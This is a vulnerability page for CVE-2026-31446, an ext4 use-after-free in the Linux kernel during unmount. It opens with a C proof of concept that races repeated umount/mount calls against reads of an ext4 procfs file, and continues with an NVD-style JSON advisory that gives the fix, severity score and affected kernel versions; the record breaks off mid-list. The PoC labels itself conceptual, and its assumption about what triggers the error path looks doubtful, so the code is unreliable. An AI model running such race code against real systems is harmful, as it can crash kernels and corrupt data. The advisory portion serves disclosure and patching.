CVE-2026-31446

/* * Conceptual PoC for CVE-2026-31446 * This code attempts to trigger the race condition between * ext4_notify_error_sysfs and ext4_unregister_sysfs. * Compile: gcc -o poc cve-2026-31446.c -lpthread */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pthread.h> #include <sys/mount.h> #include <string.h> // Assume an ext4 filesystem is mounted here #define MOUNT_POINT "/mnt/test_ext4" #define DEVICE "/dev/sda1" #define SYSFS_PATH "/proc/fs/ext4/sda1/mb_groups" void *unmount_thread(void *arg) { char cmd[256]; while (1) { // Attempt to unmount to trigger the teardown sequence system("umount " MOUNT_POINT " 2>/dev/null"); // Remount to keep the loop going for testing purposes (in a real scenario, this happens once) system("mount " DEVICE " " MOUNT_POINT " 2>/dev/null"); usleep(10000); // Short delay } return NULL; } void *trigger_sysfs_thread(void *arg) { char buf[1024]; FILE *fp; while (1) { // Reading mb_groups triggers ext4_error handling which queues update_super_work fp = fopen(SYSFS_PATH, "r"); if (fp) { while (fgets(buf, sizeof(buf), fp)) { // Consume file to trigger sysfs interaction } fclose(fp); } usleep(1000); // High frequency access } return NULL; } int main() { pthread_t t1, t2; printf("Starting PoC for CVE-2026-31446...\n"); printf("Ensure %s is mounted and writable.\n", MOUNT_POINT); // Create threads to race against each other pthread_create(&t1, NULL, unmount_thread, NULL); pthread_create(&t2, NULL, trigger_sysfs_thread, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); return 0; }

{"cve": {"id": "CVE-2026-31446", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:38.340", "lastModified": "2026-05-07T19:21:44.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix use-after-free in update_super_work when racing with umount\n\nCommit b98535d09179 (\"ext4: fix bug_on in start_this_handle during umount\nfilesystem\") moved ext4_unregister_sysfs() before flushing s_sb_upd_work\nto prevent new error work from being queued via /proc/fs/ext4/xx/mb_groups\nreads during unmount. However, this introduced a use-after-free because\nupdate_super_work calls ext4_notify_error_sysfs() -> sysfs_notify() which\naccesses the kobject's kernfs_node after it has been freed by kobject_del()\nin ext4_unregister_sysfs():\n\n update_super_work ext4_put_super\n ----------------- --------------\n ext4_unregister_sysfs(sb)\n kobject_del(&sbi->s_kobj)\n __kobject_del()\n sysfs_remove_dir()\n kobj->sd = NULL\n sysfs_put(sd)\n kernfs_put() // RCU free\n ext4_notify_error_sysfs(sbi)\n sysfs_notify(&sbi->s_kobj)\n kn = kobj->sd // stale pointer\n kernfs_get(kn) // UAF on freed kernfs_node\n ext4_journal_destroy()\n flush_work(&sbi->s_sb_upd_work)\n\nInstead of reordering the teardown sequence, fix this by making\next4_notify_error_sysfs() detect that sysfs has already been torn down\nby checking s_kobj.state_in_sysfs, and skipping the sysfs_notify() call\nin that case. A dedicated mutex (s_error_notify_mutex) serializes\next4_notify_error_sysfs() against kobject_del() in ext4_unregister_sysfs()\nto prevent TOCTOU races where the kobject could be deleted between the\nstate_in_sysfs check and the sysfs_notify() call."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.114", "versionEndExcluding": "5.11", "matchCriteriaId": "06D67EC3-92E2-452F-9826-4CF918434F2B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.38", "versionEndExcluding": "5.15.203", "matchCriteriaId": "237A1663-E334-49A1-A031-5A8D1A1782AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17.6", "versionEndExcluding": "5.18", "matchCriteriaId": "49134C93-AD6F-411A-A4B1-E5E509EEFB00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18.1", "versionEndExcluding": "6.1.168", "matchCriteriaId": "0292DDCD-3BB0-457C-AB09-7796072CC1DB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": "CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:-:*:*:*:*:*:*", "matchCriteriaId": "0384FA0A-DE99-48D7-84E3-46ED0C3B5E03"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:rc4:*:*:*:*:*:*", "matchCriteriaId": "DA5F085D-52F3-4EE2-8353-455D1A6FE073"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:rc5:*:*:*:*:*:*", "matchCriteriaId": "D6EE5B78-0D83-4715-89 ... (truncated)